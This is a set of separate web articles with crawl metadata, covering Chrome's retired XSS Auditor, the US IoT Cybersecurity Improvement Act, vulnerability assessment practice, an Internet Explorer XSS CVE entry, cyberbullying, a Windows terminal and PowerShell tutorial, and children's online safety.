Attempts have been made in the past to stop cross-site scripting. One such attempt was XSS Auditor, a feature added to Google Chrome v4 in 2010. XSS Auditor aims to detect XSS vulnerabilities while the browser is processing the code of websites, using a blocklist to identify suspicious code. In July of this year, Google security engineer Thomas Sepez announced the retirement of XSS Auditor. Google senior security engineer Eduardo Vela Nava had first proposed its retirement in October 2018. "We haven't found any evidence the XSSAuditor stops any XSS, and instead we have been experiencing difficulty explaining to developers at scale, why they should fix the bugs even when the browser says the attack was stopped," Nava said. "In the past 3 months, we surveyed all internal XSS bugs that triggered the XSSAuditor and were able to find bypasses to all of them." As the above examples show, cross-site scripting is a menace to websites and applications. This holiday season – the time of year when online shopping and other transactions are at their peak – it's important to sanitize your organization's website and applications to protect them from cross-site scripting. When you need to protect your website and web applications against XSS and other common attacks, our team of experts is a phone call away and ready to protect your web applications in just minutes. Under denial of service attack with ransom demands? Don't pay! We will stop the DDoS attacks in a few minutes, for good. Call today (888) 900-3749 or connect with us online.

Author: Steve E. Driz, I.S.P., ITCP
<urn:uuid:2e160caa-fbbf-4d5d-a5f5-fdc6dc448e16>
CC-MAIN-2024-38
https://www.drizgroup.com/driz_group_blog/archives/12-2019
2024-09-11T22:55:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00712.warc.gz
en
0.941333
4,974
3.171875
3
Cybersecurity made it through Capitol Hill! After its long, long journey to Washington D.C., the Internet of Things Cybersecurity Improvement Act has finally become a law. (Throwback to School House Rock, anyone?) On Dec. 4, the president signed new legislation to mandate security requirements for internet-connected devices and smart sensors purchased by the federal government. This new law will require the National Institute of Standards and Technology (NIST) and the Office of Management and Budget (OMB) to create and review standards for connected devices which have long been plagued by security and privacy issues. As we know, setting a minimum security standard for all connected devices purchased by government agencies is no easy feat. But what does all of this mean for government agencies deploying IoT devices? What’s the big deal? According to Sen. Gardner, co-chair of the Senate Cybersecurity Caucus, “Most experts expect tens of billions of devices [to be] operating on our networks within the next several years as the Internet of Things (IoT) landscape continues to expand.” Now more than ever, our world is reliant on digital devices, expanding the potential attack surface. By establishing a clear minimum standard for connected devices for government use, the government will be able to confidently work with contracted manufacturers knowing their data and information will be secure. Here are some existing challenges with IoT device security that government entities are currently facing: - Malware: Although malware has existed for many years, the rapid growth in the number of IoT devices and the insecure deployment of such devices has made it easier for cybercriminals to infiltrate government agencies through malicious code. For example, in Sept. 2016, Mirai, a botnet code, infected millions of routers and CCTV cameras through compromised devices. This led to an attack against DNS provider Dyn, causing many services to go offline. - Insecure Wi-Fi Connection: While the focus is often on the IoT device itself, vulnerable Wi-Fi connections are just as, if not more, dangerous. As government agencies have been spread thin during the pandemic, many devices have been used on insecure home networks, leaving agencies more vulnerable to attacks. - Unsegmented Networks: When multiple devices are connected over a single, unsegmented network, access to one device can mean access to all. Rather than segmenting a network to separate computers, printers, and other computing and IoT devices, some agencies use a single, unsegmented network that leaves them vulnerable to malware and other attacks through a single source. Challenges associated with IoT devices will only continue to increase through insecure connections and devices. With cybersecurity standards here to regulate challenges facing our connected world, essential infrastructure may experience a huge facelift in the security arena. After almost three years, the federal government has taken a huge step forward for cybersecurity – and we hope it doesn’t stop here. Carolina Advanced Digital offers consulting, services, and products for managing IoT security including wireless security, network hardening, Zero Trust Networking, NAC and other dynamic segmentation solutions as well as SOC-as-a-Service and managed security solutions. Most of our solutions are available on convenient procurement contracts such as NASA SEWP V, GSA, and state contracts. For federal buyers, we’re also HUBZone and SDVOSB certified. 
Contact us today to schedule a call and discuss your needs!
<urn:uuid:d9f79fd6-b158-4646-9321-9ef41c426ca9>
CC-MAIN-2024-38
https://cadinc.com/cybersecurity-for-all-how-the-iot-cybersecurity-improvement-act-will-impact-government-entities/
2024-09-13T05:00:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00612.warc.gz
en
0.944782
699
2.8125
3
Vulnerability Assessments: 4 Crucial Steps for Identifying Vulnerabilities in Your Business

There are times when security professionals need to assess the vulnerability of their systems, especially when evaluating the results of automated reports. In addition to the information they reveal, vulnerability assessments provide an excellent opportunity for a strategic view of potential security threats.

What Is a Vulnerability Assessment?

A core part of your technology risk management strategy, a vulnerability evaluation or assessment is a mechanism for identifying security flaws within information systems. It determines if and how a system is exposed to known threats and designates severity levels accordingly. Characteristics of a vulnerability assessment include:
- Concentrated evaluations of the adequacy and execution of technical, operational, and management security controls
- A concerted effort to discover all vulnerabilities in the systems and components
- A contribution to risk management
- Full knowledge and assistance of systems administrators
- No harm to systems

It will also make recommendations for actions that can be taken to mitigate the threats where possible. The types of threats that these evaluations cover include:
- Faulty authentication resulting from escalating authorizations
- Insecure defaults resulting from software that is released with settings that are not secure
- Code-based injection attacks such as XSS or SQL injection

Types of Assessments

A vulnerability assessment is an examination of vulnerabilities in IT systems at a certain point in time, with the goal of detecting system flaws before hackers can exploit them. Security assessments come in four types: application scans, network or wireless assessments, database assessments, and host assessments.
- Application scans – These scans identify security gaps within web-based applications as well as their source code. They are automated and conducted either statically or dynamically, against the code or the front end
- Network or wireless assessment – This involves evaluating practices and policies that prevent unauthorized access to public or private networks and network-accessible resources
- Database assessment – The evaluation of large data systems or databases is undertaken to identify misconfigurations and flaws, including rogue databases and insecure test/dev environments, and to classify any data deemed sensitive across the entire infrastructure
- Host assessment – This involves a review of critical servers that might be susceptible to attack if they are not sufficiently tested or are generated from a machine image

Setting the Scope for Vulnerability Evaluations

There is a difference between presuming you're exposed to a cyberattack and understanding exactly how vulnerable you are. The purpose of a vulnerability assessment is to close this gap. A vulnerability assessment examines some or all of your systems and creates a comprehensive vulnerability report. This report can then be used to address the issues discovered and avoid security breaches. Vulnerability assessments may contain the following components:
- External Vulnerability Assessment – Identifies external vulnerabilities
- Internal Vulnerability Assessment – Identifies internal network vulnerabilities
- Social Engineering – Identifies human resource weaknesses and training shortfalls
- Physical Security Assessments – Identifies physical security weaknesses

Vulnerability Assessment vs Penetration Testing

Vulnerability assessments detect vulnerabilities but do not attempt to exploit them.
Numerous vulnerability assessments use a scanning programme that ranks the vulnerabilities, allowing security experts to prioritize which ones to fix first. Penetration testing is a distinct type of security testing that begins with a vulnerability assessment and employs human testers to exploit flaws and gain unauthorized system access. Organizations use penetration testing to mimic the amount of harm an attacker could cause by fully exploiting vulnerabilities. Vulnerability assessments, which are generally automated, can be used alongside penetration testing to provide frequent insight between penetration examinations. The two approaches compare as follows:
- Goal: vulnerability assessments uncover known vulnerabilities across the environment; penetration testing identifies and exploits vulnerabilities to demonstrate how criminals might use them to move laterally or deeper into the environment.
- Scope: broad, scanning the surface, versus focused and deep.
- Performed by: automated tool(s) with human oversight, versus experienced hackers and cybersecurity professionals.
- Output: a list of vulnerabilities, versus a prioritized collection of vulnerabilities, exploitable techniques, narrative walkthroughs of attack scenarios, and advice for repair.
- Next step: prioritize remediation and patching, versus applying patches and other security updates that significantly minimize risk.
- Best for: obtaining an overview of an organization's security posture, versus understanding all facets of an organization's security posture.

Performing a Vulnerability Evaluation

A rising number of businesses rely on technology to carry out their everyday operations, yet cyber dangers such as ransomware can bring a firm to a standstill in an instant. It is widely recognized that prevention is better than cure, hence the increased importance of cybersecurity and the demand for solutions that ensure resilience. More SaaS customers, for example, now want frequent vulnerability assessments, and having proof of security testing can help you generate more revenue. Security scanning can be broken down into four steps: identification, analysis, assessment, and remediation.
- Identification – The goal here is to locate the root cause and source of the vulnerability. System components must be reviewed individually, as the source of the exposure might be something like an older version of an open source library; in that case, upgrading the library would resolve the issue.
- Analysis – The purpose of the analysis is to formulate a list of vulnerabilities for the application. Security experts review application health, including servers and other systems, using automated tools to scan them. These experts might also use security databases, exploits announced by vendors, threat-based intelligence feeds, and asset management systems.
- Assessment – Assessment is used to prioritize the vulnerabilities. Severity scores need to be assigned to each exposure, based on the specific affected systems, the type of vulnerable data, the endangered business functions, and how easily attacks can be conducted. The score also conveys the possible damage the exploit might cause.
- Remediation – This final step involves sealing the security gaps that have been discovered and analyzed. It will usually involve a collaboration between security personnel and operations or development teams, who will need to decide the wisest approach for mitigation.
Measures which might be taken include:
- Introducing updated security tools or procedures
- Making changes to configuration or operational methods
- Creating and installing security patches

This process is ongoing and should never be a one-off. Institutions have to operationalize their procedures and then repeat them regularly at specific intervals. It is also essential to encourage collaboration between development, security and operations teams.

The 4 Most Important Steps for Evaluating Vulnerability

Here is a proposed four-step method to start an effective vulnerability assessment process using any automated or manual tool. The first step is to determine your assets and then designate every device's criticality and risk value (which should be informed by client input) – the security scanner itself is one example. It is essential to define the importance of each network device, or at least of the ones you intend to test. You'll also need to know how these devices are accessed by company staff, including administrators. Key factors to consider include risk tolerance, risk appetite, and risk treatment. Other factors may include device countermeasures, mitigation practices for every device, and organizational impact analysis.

Baseline System Definition

The second step is to collect information about your systems before the vulnerability evaluation. This helps determine whether a device has services, processes, or ports that are open and shouldn't be. It is also critical to know which software and drivers have been approved and should be part of the device's installation and basic configuration. Perimeter devices should not have default administrator usernames configured. One way to ascertain what public information is accessible, based on the configuration baselines, is banner grabbing. Are the devices transmitting logs to the SIEM (Security Information and Event Management) system? Are the logs saved in a centralized repository? Collect all the vulnerabilities and public information for each device platform, the vendor, the version, and other pertinent details.

Execute Your Vulnerability Scan

Now you want to use the correct scanner policy to achieve the right results. Before beginning your vulnerability scan, check the compliance requirements determined by your industry, and choose an ideal date and time. Knowing the context of your client's industry will help you decide when the scan should be performed and whether segmentation is preferable. You'll need to define the scan and then acquire approval to start it. To gain optimal results, you'll want to use the related plugins and tools. Examples include:
- Quick and stealth scans
- CMS-based web scans for platforms like Drupal, Joomla or WordPress
- Aggressive scans
- Firewall scans
- Full scans, which include DDoS (denial of service) checks
- Payment card data standards such as PCI DSS
- OWASP (Open Web Application Security Project) checks
- HIPAA (Health Insurance Portability and Accountability Act) scans

Vulnerability Evaluation Report Creation

The fourth and final step is creating the report itself. Pay close attention to details and create additional value during the recommendation phase. To obtain genuine value from your final report, include recommendations tied to your original assessment goals. Adding further risk mitigation procedures, weighted by importance, will lead to tremendous long-term success.
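As an illustration of how the prioritization just described might be operationalized, the following Python sketch ranks findings by a weighted severity value. The weighting convention (CVSS base score adjusted by asset criticality and internet exposure) is an assumption made for the example, not a standard formula; the finding names and values are fictitious.

```python
# Sketch: rank findings so the riskiest ones are remediated first.
from dataclasses import dataclass

@dataclass
class Finding:
    name: str
    cvss: float             # 0.0 - 10.0 base score reported by the scanner
    asset_criticality: int  # 1 (low) to 5 (business critical), from the asset inventory
    internet_facing: bool

    @property
    def priority(self) -> float:
        # Scale the scanner score by how important the asset is,
        # then boost findings on internet-facing systems.
        score = self.cvss * (self.asset_criticality / 5)
        return score * 1.5 if self.internet_facing else score

findings = [
    Finding("Outdated OpenSSL on public web server", 7.5, 5, True),
    Finding("Default SNMP community string on printer", 5.3, 1, False),
    Finding("SQL injection in internal HR application", 9.8, 4, False),
]

for f in sorted(findings, key=lambda f: f.priority, reverse=True):
    print(f"{f.priority:5.1f}  {f.name}")
```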
Mention findings associated with possible gaps between the baseline system definitions and the results. This should include misconfigurations and other significant discoveries. Recommendations for correcting these issues must be thoroughly highlighted. Other things to include in the final report are:
- The vulnerability name
- Its severity score, typically a CVSS (Common Vulnerability Scoring System) score, together with the associated CVE (Common Vulnerabilities and Exposures) identifier
- The date the vulnerability was discovered
- Details of the affected systems
- A comprehensive description of the vulnerability
- The time needed to correct it
- How the vulnerability was corrected
- A PoC (Proof of Concept) for the vulnerability

Once you have this information, the recommended-actions phase will showcase a comprehensive understanding of every aspect of your security system.

Next Steps: Building a Vulnerability Management Program

New vulnerabilities are found daily. Vulnerability management (VM) is a process for identifying, eliminating and controlling vulnerabilities. A vulnerability management programme makes use of specific software and procedures to help eradicate discovered vulnerabilities. Scaling the programme to the business's requirements, complexity, and IT environment is critical. Even the smallest businesses can handle vulnerabilities manually; automation and workflow, however, are advised to assure consistency, compliance (job completion assurance), and cost savings. A vulnerability management maturity model demonstrates how the programme can scale. A robust cyber security posture necessitates regular vulnerability evaluations. Because of the sheer number of vulnerabilities and the complexity of the ordinary company's digital infrastructure, an organization is nearly certain to have at least one unpatched vulnerability that puts it at risk. Finding these flaws before an attacker does might mean the difference between a thwarted attack and a costly and humiliating data breach or ransomware outbreak. One of the best things about vulnerability assessments is that you can perform them yourself and even automate them. You can significantly reduce your cyber security risk by investing in the correct technologies and running frequent vulnerability scans.
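To make the report fields listed above concrete, here is a minimal Python sketch of a structured report entry. The field names follow the list in this article; the CVE chosen is a well-known real identifier (Log4Shell), but the dates, host names and remediation details are fictitious example values. Capturing entries this way makes it easy to track findings between assessments or feed them into a ticketing system.

```python
# Sketch: a machine-readable vulnerability report entry (Python 3.9+ for list[str]).
from dataclasses import dataclass, asdict
from datetime import date
import json

@dataclass
class ReportEntry:
    name: str
    cve_id: str                 # CVE identifier, e.g. "CVE-2021-44228"
    cvss_score: float           # severity score associated with the finding
    discovered_on: date
    affected_systems: list[str]
    description: str
    remediation_time_days: int
    remediation: str
    proof_of_concept: str

entry = ReportEntry(
    name="Log4Shell remote code execution",
    cve_id="CVE-2021-44228",
    cvss_score=10.0,
    discovered_on=date(2024, 3, 2),
    affected_systems=["app-server-01", "app-server-02"],
    description="Vulnerable Log4j version allows JNDI lookup injection.",
    remediation_time_days=3,
    remediation="Upgraded Log4j to a patched release and removed the JndiLookup class.",
    proof_of_concept="Callback observed from a test payload in a controlled environment.",
)

print(json.dumps(asdict(entry), default=str, indent=2))
```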
<urn:uuid:d17eba0f-0c9b-4d27-a563-0458f3d309db>
CC-MAIN-2024-38
https://www.businesstechweekly.com/cybersecurity/network-security/vulnerability-assessment/
2024-09-13T04:25:37Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00612.warc.gz
en
0.919019
2,317
2.984375
3
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 9 through 11 allows remote attackers to bypass the Same Origin Policy and inject arbitrary web script or HTML via vectors involving an IFRAME element that triggers a redirect, a second IFRAME element that does not trigger a redirect, and an eval of a WindowProxy object, aka "Universal XSS (UXSS)." CWE-79 - Cross Site Scripting Cross-Site Scripting, commonly referred to as XSS, is the most dominant class of vulnerabilities. It allows an attacker to inject malicious code into a pregnable web application and victimize its users. The exploitation of such a weakness can cause severe issues such as account takeover, and sensitive data exfiltration. Because of the prevalence of XSS vulnerabilities and their high rate of exploitation, it has remained in the OWASP top 10 vulnerabilities for years.
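As a complementary, hedged illustration of one widely used mitigation for this class of weakness, the sketch below uses Python's standard http.server to send a restrictive Content-Security-Policy header that blocks inline scripts. It is a minimal demonstration only; production systems would normally set such headers in their web framework, reverse proxy, or CDN, and output encoding of untrusted input remains the primary defence.

```python
# Sketch: serve a page with a Content-Security-Policy header that disallows inline
# scripts and restricts script sources to the page's own origin.
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"<html><body><h1>Hello</h1></body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        # Injected <script> blocks and inline event handlers will be refused by the browser.
        self.send_header("Content-Security-Policy", "default-src 'self'; script-src 'self'")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8000), Handler).serve_forever()
```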
<urn:uuid:8fb5ecad-598c-452b-b030-c83d841f8066>
CC-MAIN-2024-38
https://devhub.checkmarx.com/cve-details/cve-2015-0072/
2024-09-16T23:26:35Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00312.warc.gz
en
0.88086
197
3.140625
3
Are you being harassed or blackmailed online? We can help you fight back. Individuals, small businesses and large corporations are open to all sorts of online attacks: In such cases, the [...] If you have not spoken out about cyberbullying, today is a great day to do so. June 15, 2018, is designated as Stop Cyberbullying Day, an internationally recognized day of awareness and activities founded by The Cybersmile Foundation in 2012. It takes place the third Friday in June each year. Stop Cyberbullying Day encourages people around the world to show their commitment toward an inclusive, diverse and welcoming online environment for all – without fear of personal threats, harassment or abuse. The hashtag #STOPCYBERBULLYINGDAY is used on social media to show support and to help spread the word. At Digital Forensics Corp., we help people cope with online [...] We've all heard the horror stories about cyberbullying. Online bullies, often acting anonymously, pick a target and never let up. They harass, they make threats, they spread rumors on social media. They make their targets feel rejected, isolated, excluded. It can lead to despair, depression and anxiety, which sometimes can contribute to suicidal behavior. It is hell to deal with, and too many families know this pain all too well. Many families find themselves wondering how to avoid cyberbullying. How common is cyberbullying in the United States? Here are some [...]
<urn:uuid:0bddff31-12de-412b-b8bb-7b1d06c4d6b9>
CC-MAIN-2024-38
https://www.digitalforensics.com/blog/tag/online-harassment/
2024-09-19T11:25:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00112.warc.gz
en
0.933647
499
2.609375
3
Terminal, console, and shell are key concepts for working with PowerShell, which lets users interact with the Windows operating system through commands and scripts. PowerShell provides a powerful interface for managing the system and performing various tasks, helping to increase productivity and efficiency. A terminal is a text-based interface that allows a user to enter commands and receive responses from the operating system. It is the starting point for interacting with PowerShell, where the user can run commands and view the results. The console is a window that displays the results of executed commands, error messages, and other important information. It provides a convenient way to view results and interact with the command shell. A command shell (interpreter) is software that executes commands and scripts entered by the user in a terminal or console. PowerShell has its own command shell that allows you to perform various tasks such as managing files, the registry, services, the network and much more. In this guide to the PowerShell terminal, console, and shell, we'll cover the basic commands and features that will help you get comfortable working with PowerShell. You'll learn about different ways to interact with the shell, including running scripts, running commands in the background, and more. Our guide will help you quickly learn the basics of PowerShell and become more confident in using this powerful tool.

In the previous section, we talked about the command line mode in Windows and the two different command shells of this operating system, and mentioned working in terminals and console applications. To work effectively and comfortably on the command line, it is important to choose the right tool, and for that you need to understand clearly what these terms mean. The word "terminal" is related to the verb "terminate" and means an end device – a device that sits at one end of a conversation with another device (a server). The task of the terminal is to send text entered from the keyboard to the server and to output text responses from the server. The first terminals in the 1950s and 1960s were connected to large computers via telephone lines. These were electric typewriters (teletypewriters, TTYs). Teletypewriters typed commands, and server responses were printed line by line on a roll of paper (Fig. 2.1). Later, instead of a printer, computer terminals began to use a device with a built-in keyboard and monitor called a console. The word "console" appeared long before the invention of computers and meant a bracket or a stand for something. Later, panels with buttons and switches for controlling electrical devices also came to be called consoles (Fig. 2.2). Thus, a console is a device, and a terminal is the communication program inside the console that performs the following tasks:
- Recognizing and accepting characters typed by the user on the keyboard.
- Forming a single line from the received characters, taking into account control codes (for example, moving the cursor or deleting a character).
- Exchanging text with a computer through a direct physical connection or over communication lines.
- Displaying the text received from the computer on the screen.

The terminal must also recognize and process so-called ANSI escape codes to set the format, color and other parameters of the output text (for example, to move the cursor to an arbitrary position on the screen).
This mechanism – a terminal sending characters to a program running on a computer and displaying the text received from that program on the screen – remains to this day the basic model of human-computer interaction through the command line. Since the mid-1980s, hardware consoles and terminals have been superseded by personal computers, and in modern operating systems terminals and consoles are software analogues of the TTY. These are programs that let you enter character commands, send those commands to another process, and display the strings of text coming back from that process. Commands coming from the terminal are executed by a special program called a command shell. Depending on the command received, the shell performs certain actions and generates strings of characters that are sent back to the terminal for display on the screen. Each operating system has different shells, which differ in their set of commands. On UNIX-like systems (Linux and macOS), the bash, zsh, fish and tcsh shells are most often used. Windows 10, as we saw in Chapter 1, has two standard shells: cmd.exe (the command line) and Windows PowerShell. It is important to understand that command shells do not have their own user interface; they are not terminals. You can work with the same shell using different terminals, and different shells can be launched from the same terminal.

A terminal and a shell are two applications running on the same computer that need to exchange text with each other. On UNIX-like systems, this problem is solved with the help of a pseudo-terminal (pseudo-TTY, PTY), which provides two virtual devices: a master and a slave. The terminal application is connected to the master pseudo-device, and the command shell or another console application to the slave. When the terminal application sends characters to the input of the master device, they are redirected to the output of the slave device. Lines of text formed by the shell or application are sent to the input of the slave device and redirected to the output of the master device (Fig. 2.3). At the same time, the slave device emulates the behavior of a hardware terminal, picking out certain control combinations of characters from the input stream and sending the corresponding signals to the connected application. This mechanism has been in use since the 1980s and supports the operation of terminal applications, including full-screen console programs.

In Windows, terminal emulation is implemented differently. Recall that all modern versions of Windows are descendants of the original Windows NT operating system, developed by Microsoft in the early 1990s. Command line work in Windows NT was carried out using the Windows Console associated with the cmd.exe shell (command interpreter). This standard console has continued to be used in Windows for almost 30 years. Functionally, the Windows console host (ConHost) is similar to a traditional terminal, but it is arranged differently, without the use of a PTY pseudo-terminal. On UNIX-like systems, a user who wants to work with the command line first starts a terminal, which establishes a connection to the default shell. In Windows, the user does not run the terminal itself (starting with Windows 7, it is represented by the file conhost.exe), but an executable file with a shell (cmd.exe or powershell.exe) or another console utility (Fig. 2.4).
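As a brief aside before continuing with Windows: on a UNIX-like system, the master/slave PTY pair described above can be demonstrated in a few lines of Python with the standard pty module. This is an illustrative sketch only – the shell path and the fixed sleep are simplifications.

```python
# Sketch (UNIX-like systems only): the "master" end plays the role of the terminal
# application; the shell is attached to the "slave" end and believes it is a real TTY.
import os
import pty
import subprocess
import time

master_fd, slave_fd = pty.openpty()          # create the pseudo-terminal pair

# Attach a shell to the slave end, as a terminal emulator would.
shell = subprocess.Popen(
    ["/bin/sh", "-i"],
    stdin=slave_fd, stdout=slave_fd, stderr=slave_fd,
)

os.write(master_fd, b"echo hello from the shell\n")  # "type" a command on the master side
time.sleep(0.5)                                      # crude wait for the shell to respond

output = os.read(master_fd, 4096)            # read what the shell "displayed"
print(output.decode(errors="replace"))

shell.terminate()
shell.wait()
os.close(master_fd)
os.close(slave_fd)
```

Running it prints the shell's prompt and the echoed command output – exactly the text a terminal emulator would render on screen.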
When such a shell or console utility starts, the operating system automatically connects it to a new instance of the ConHost console. The ConHost process interacts with the shell using system messages (I/O Control, or IOCTL, messages) through a special driver, and not through text streams via a PTY pseudo-terminal as in UNIX systems. The mechanism for supporting console programs in Windows therefore differs significantly from the approach adopted in UNIX systems. For any running command shell or command line utility, the Windows operating system always assigns the standard ConHost console (conhost.exe) as the terminal. Communication channels between the console and utilities are created by the operating system itself. Command-line utilities interact with the console by calling functions from the Win32 console API, for example to set the text and background color or move the cursor to the desired position.

These architectural features of the Windows console became a source of problems over time. It is difficult to create alternative terminal software for Windows: the developers of such applications (the ConEmu, Cmder, Console2 and Hyper terminal emulators, for example) had to launch a standard Windows console in a window outside the visible area of the monitor, send the characters entered by the user to it, and then read the lines returned by the shell from that hidden window and display them in their own window. Console applications that use Win32 functions to work with the console are also difficult to port to other platforms, where the terminal is controlled via character streams, and this inconsistency in console handling likewise makes porting console applications to Windows difficult. Windows 10 supports the Windows Subsystem for Linux (WSL), which allows you to install a Linux distribution inside Windows and use shells and standard utilities from that operating system; control sequences coming from these utilities, however, could be processed incorrectly by the Windows console. Problems also arise when connecting to a Windows command line on a server from remote terminals on other computers: in this case, Win32 Console API functions would need to be called remotely, and the client machine may not be running Windows at all.

To solve such tasks, Microsoft developers added the ConPTY pseudo-console infrastructure to Windows in 2018, while maintaining backward compatibility with the traditional ConHost. ConHost now fully supports utilities that use UTF-8 encoding and ANSI sequences to control the terminal (thanks to this, for example, full-screen utilities run in a WSL session are displayed correctly in the Windows console). In addition, it is now possible to create alternative terminals for Windows that work through ConPTY. In 2019, Microsoft introduced a new and improved terminal for Windows called Windows Terminal. It is open source software (the source code is hosted on GitHub: https://github.com/microsoft/terminal), which is actively developed and positioned by Microsoft as the main tool for working with various shells and command line utilities in modern versions of Windows. Its features include:
- Tab support, to open multiple shell sessions in a single window.
- Division of the window into several independent panes, in which you can open different shells.
- A command palette for entering or selecting commands that control the terminal.
- Control over how text is displayed in the terminal.
- Full UTF-8 encoding support.
- 24-bit color.
- Support for graphical themes and translucent backgrounds in the terminal.
- Support for different display modes of the terminal window.
- Clickable hyperlinks in the text displayed in the terminal.
- Copying text to the system clipboard in HTML and RTF formats.

The easiest way to install Windows Terminal is from the Microsoft Store (you can open it using a shortcut in the Start menu or in a browser via the link https://www.microsoft.com/ru-ru/store/apps/windows) (Fig. 2.5). Other installation options are described in the terminal repository on GitHub (https://github.com/microsoft/terminal). After installation, a Windows Terminal shortcut will appear in the Start menu. To launch the terminal, you can use this shortcut or press <Win>+<R> and enter wt, the name of the terminal's startup file, in the "Run" window. A new Windows PowerShell terminal window will open (see Fig. 2.6). Let's take a look at the new features of Windows Terminal that were not present in the previous terminal. To create a new tab with the PowerShell shell, click the + icon or press <Ctrl>+<Shift>+<T>. If you click the v icon, a list will open where you can choose a different profile (command shell) for the new tab (Fig. 2.7): the standard Command Prompt (the cmd.exe interpreter), or the bash shell of the Linux operating system (if the WSL subsystem is installed and configured). The window in each tab can be divided into several panes, both vertically and horizontally. This allows you to view multiple command line sessions simultaneously without having to switch between tabs (see Fig. 2.8). Splitting vertically opens a new pane to the right of the selected pane; splitting horizontally opens one below it. You can use keyboard shortcuts to divide the window into panes. If several panes are open in a tab, you can switch between them either with the mouse or with the arrow keys while holding down the <Alt> key. You can resize the panes by holding <Alt>+<Shift> and using the arrow keys. Various terminal control commands can be executed not only with key combinations but also by entering or selecting them in the command palette, which is opened by pressing <Ctrl>+<Shift>+<P> (Fig. 2.9). To start a new instance of Windows Terminal from the command line, use the wt command. Additional command arguments let you set the current directory in which the terminal will be opened, automatically create new tabs, or split a tab into several panes. Terminal commands are separated by semicolons. For example, the following command: wt -d C:\ ; split-pane -p "Windows PowerShell" ; split-pane -H wsl.exe will launch a new terminal with three panes on one tab. First, the default profile, PowerShell, opens in the root C:\ (the -d C:\ argument). Then the pane is split vertically and Windows PowerShell opens in the right half in the user's home directory (the split-pane -p "Windows PowerShell" command). Finally, the right pane is split horizontally, and the bottom half opens the WSL subsystem's bash interpreter (the split-pane -H wsl.exe command). A description of other arguments that can be specified when starting the terminal can be found in the documentation on the Microsoft website (https://docs.microsoft.com/ru-ru/windows/terminal/command-line-arguments).

Hardware terminals allowed communication between computers through the command line at the very beginning of the computer era.
Before the advent of personal computers, consoles were used to work with servers in the command line mode – devices with a built-in keyboard and monitor, in which a software analogue of the terminal was launched. A terminal program allows you to enter character commands, sends them to another process, and displays lines of text coming from that process. Commands coming from the terminal are executed by the command shell. Shells do not have their own user interface. For a personal computer, a terminal and a command shell are two programs running on the same computer that need to exchange text with each other. You can work with the same shell using different terminals, and different shells can be launched from the same terminal. Windows includes two command shells: the standard cmd command line and Windows PowerShell. Windows uses the ConHost console as a standard terminal to which the operating system automatically connects a running shell or console application. Alternatively, you can install an enhanced Windows Terminal on Windows. This is an open source application that is actively developing and is positioned by Microsoft as the main tool for working with command line shells in modern versions of Windows. Thanks to our team of volunteers for providing information from open sources.
<urn:uuid:7765fbde-441c-4e59-b3bb-8700b5231d44>
CC-MAIN-2024-38
https://hackyourmom.com/en/osvita/chastyna-2-znajomymosya-z-powershell-terminal-konsol-ta-komandna-obolonka/
2024-09-20T17:26:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00012.warc.gz
en
0.913093
3,098
3.671875
4
We are living in a world where technology is seamlessly integrated into every facet of our lives, and ensuring the safety of our children in the online world has become an essential concern. The internet has undoubtedly revolutionized how we access information, communicate, and learn, offering unprecedented opportunities for growth and exploration. However, it also presents many risks and challenges, particularly for young individuals who may be less equipped to navigate the complex landscape of the online realm.

Why is it important to protect your child online?

The concept of online safety for children extends far beyond just limiting screen time or installing parental controls. It encompasses a comprehensive approach that involves educating children about potential risks, fostering open communication, setting boundaries, and equipping them with the tools and knowledge to make responsible choices in their digital interactions. As children increasingly engage in online activities such as social media, online gaming, and educational platforms, the need to establish a robust framework for their identity protection becomes even more critical. As parents we all hope for the best for our kids, and our desire is to keep them in a safe and friendly environment. But do we know enough about the potential risks lurking on the web? In this article, we will discuss the main threats and how to protect your children online as much as possible.

Statistics regarding online threats against children

The digital world is not without its perils, and the statistics are a stark reminder of the challenges that children face in the online realm. Cyberbullying, exposure to inappropriate content, online predators, and other threats have become disturbingly prevalent. The National Center for Missing and Exploited Children (NCMEC) reports a steady rise in cases related to online exploitation and child endangerment. According to a survey conducted by the Pew Research Center, 59% of U.S. teens have experienced some form of online harassment, highlighting the pervasive nature of cyberbullying. Another study, from the Crimes Against Children Research Center, found that one in seven youngsters received unwanted sexual solicitations online – a fact that is creepy and disgusting. These alarming figures underscore the urgent need for active protection measures to safeguard children's online experiences.

Awareness and Communication

Nowadays, to protect your children online it is essential to create awareness and promote dialogue about the risks present on the internet. To ensure their safety, we need to play an active role in equipping them with the understanding and resources to navigate the online environment responsibly. One key aspect is educating children about the significance of protecting their personal information. Instilling the understanding that personal information is a precious commodity that should be shared only with trusted individuals and sources helps to establish a foundation of caution. Encouraging them to be vigilant about the information they divulge on online accounts, social media sites, and chat rooms can fortify their defenses against potential threats. Equally important is cultivating responsible online behavior at a young age. Teaching kids to think critically and question the authenticity of online information can help them discern between safe and risky online interactions.
Nurturing a sense of digital citizenship involves encouraging children to treat others online with kindness and respect, mirroring the same values they would hold in the physical world. Engaging in open dialogue about the potential dangers they might encounter, such as interacting with strangers in chat rooms, can empower children to make informed decisions and report any uncomfortable experiences. By promoting a culture of awareness and communication, parents and guardians create a supportive environment where children can safely explore the digital realm while staying vigilant against online threats. It is our responsibility to protect children online and to be open with them about these scary aspects of their online activities, because the internet can be a very dangerous place.

The importance of educating children about online risks

